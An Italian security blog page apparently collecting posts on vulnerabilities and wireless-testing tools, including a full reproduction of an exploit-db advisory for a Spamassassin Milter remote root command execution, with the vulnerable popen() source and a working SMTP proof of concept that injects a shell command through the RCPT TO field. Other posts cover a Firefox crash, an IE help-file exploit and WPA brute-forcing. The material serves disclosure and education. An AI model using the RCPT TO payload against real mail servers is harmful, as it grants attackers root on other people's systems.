Exploit-db pubblica una nuova falla del famoso cms PHP -Nuke che affligge l’ultima relase 8.1 e permette di visionare il contenuto di un qualsiasi file all’interno della root FTP.
Dopo il salto l’exploit…

Continua a leggere

SpamAssasin è in assoluto il metodo antispam più sfruttato dalle Web Farm mondiali in quanto si integra perfettamente con Apache ed è OpenSource.

Oggi Exploit-Db pubblica una vulnerabilità scoperta da Kingcope che permette l'esecuzione remota di codice malevolo ad insaputa dell'amministratore del sistema.

L’exploit è sfruttabile esclusivamente se è installato anche il Plugin: Spamassassin Milter che permette una personalizzazione avanzata dei filtri basi di SpamAssasin.

Il codice malevolo permette l’esecuzione di qualsiasi comando come utente root e dovrò essere inserito all’interno del campo “RCPT TO”, ovvero nel campo composto solitamente dall’indirizzo e.mail del destinatario.

 

Ecco infine l’exploit dettagliato:

# Title: Apache Spamassassin Milter Plugin Remote Root Command Execution
# EDB-ID: 11662
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Kingcope
# Published: 2010-03-09
# Verified: yes
# Download Exploit Code
# Download N/A

view source
print?
Description: The Spamassassin Milter plugin suffers from a remote root command execution vulnerability. Full exploit details provided.
Author: Kingcope

Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
shadows not HERE)
aka the postfix_joker advisory

Logic fuckup?

March 07 2010 // if you read this 10 years later you are definetly
seeking the nice 0days!

Greetz fly out to alex,andi,adize
+++ KEEP IT ULTRA PRIV8 +++

Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.

SpamAssassin is a project of the Apache Software Foundation (ASF).

Postfix
What is Postfix? It is Wietse Venema's mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.

Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.

Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).

>From spamass-milter-0.3.1 (-latest) Line 820:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
 struct context *sctx = (struct context*)smfi_getpriv(ctx);
 SpamAssassin* assassin = sctx->assassin;
 FILE *p;
#if defined(__FreeBSD__)
 int rv;
#endif

 debug(D_FUNC, "mlfi_envrcpt: enter");

 if (flag_expand)
 {
 /* open a pipe to sendmail so we can do address
expansion */

 char buf[1024];
 char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
 snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
 /* XXX possible buffer overflow here // is this a
joke ?! */
 sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

 debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
 rv = pthread_mutex_lock(&popen_mutex);
 if (rv)
 {
 debug(D_ALWAYS, "Could not lock popen mutex: %
s", strerror(rv));
 abort();
 }
#endif

 p = popen(buf, "r");                [1]
 if (!p)
 {
 debug(D_RCPT, "popen failed(%s).  Will not
expand aliases", strerror(errno));
 assassin->expandedrcpt.push_back(envrcpt[0]);


[1] the vulnerable popen() call.

Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: [email protected]
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Signed,

Kingcope

Aircrack-ng, per chi ancora non la conoscesse è la suite dedicata all’analisi delle reti Wireless ed è basata esclusivamente su riga di comando.

In questo articolo vedremo la GUI (Intefaccia Grafica) per Aircrack-ng denominata WepCrackGui, interfaccia molto semplice  e di facile utilizzo in costante aggiornamento.

Il progetto nato dallo sviluppatore Criser nel dicembre ottobre 2009 è giunto ormai all’undicesimo aggiornamento dopo poco  meno di 3 mesi, pertanto sta riscuotendo a livello mondiale un notevole interessamento ed apprezzamento.

Continua a leggere

A poche ore dall’annuncio viene diramato tramite exploit-db anche il codice che permette di sfruttare la vulnerabilità di Internet Explorer legata alla pressione del tasto F1 che  interagisce con i file Windows Help.

L’exploit permette di avviare una “help” non convenzionale che potrebbe contenere codice malevolo.

Possiamo trovare il sorgente dell’exploit composto da poche e semplici righe HTML al seguente link.

Ale46, dell’università di Palermo oggi stesso ha scoperto un Denial Of Service Exploit per Mozilla Firefox.

La falla affluenza tutte le relase fino alla 3.6 (attualmente in distribuzione) di Mozilla Firefox, l’exploit composto da un semplice ciclo FOR è possibile visionarlo al sequente link.

Il codice crea l’immediato Crash di Mozilla Firefox.

Beini, per chi ancora non lo conoscesse è una ottima Live Suite per il testing delle reti Wireless, in questo articolo la vedremo in azione mente tenta il BruteForce di una rete Wireless WPA.

 

Effettuiamo il test sopra un ruoter di nostra proprietà del quale conosciamo la chiave WPA!

Inseriamo la chiave WPA della nostra rete Wireless all’interno del file password.lst che useremo per il BruteForce!

Avviamo FeedingBottle, Interfaccia Grafica di airodump-ng, e gli daremo in “pasto” la lista delle possibili password; nel nostro caso è contenuta la password corretta.

Selezioniamo la rete da Testare ed avviamo il BruteForce

Il programma analizzerà la rete Wireless con ogni password contentente nel file *.lst e si fermerà nel momento in cui troverà la corretta password per accederci.

Come ultimo passo, eventualmente, testiamo ti essere relamente collegati alla rete Wireless ed avere un corretto scambio dati tramite WireShark

Per chi ancora non conoscesse Beini sappia che è una Live Distro, basata su Tiny Core Linux, di appena 30Mb dedicata al wireless security testing.

La distro continiene al suo interno la più famosa interfaccia grafica (GUI) per Aicrack-ng, FeedingBottle!

Continua a leggere

Direttamente dal forum di BackTrack troviamo un ottima tabella che ci guida ai software da utilizzare per rintracciare una password smarrita od eventualmente cambiarla!

Dopo il salto la tabella…

Continua a leggere

Backtrack 4 è una distribuzione Linux dedicata particolarmente agli esperti di sicurezza informatica!

Integra al suo interno numerosi strumenti ed applicazioni adatti proprio agli esperti del settore per effettuare test vari sulle reti, verificare vulnerabilità varie e di reti wireless e tanto altro.

Tra gli altri strumenti disponibili compaiono dnsmap,Netmask,PsTools,TCtrace,Nmap,Protos,utility per rilevare eventuali vulnerabilità nelle reti Cisco, SQL Inject, SMB-NAT, SNMP Scanner, Pirana, Dsniff, Hydra, Sing, WebCrack, Wireshark, NSCX, Airsnort, aircrack,  BTcrack, SNORT, Hexedit, per una lista completa che supera le 300 applicazioni.

Potete scaricare BackTrack sul sito ufficiale e scegliere tra la versione ISO o Virtuale, BackTrack può girare sia su una macchina Virtuale oppure Live.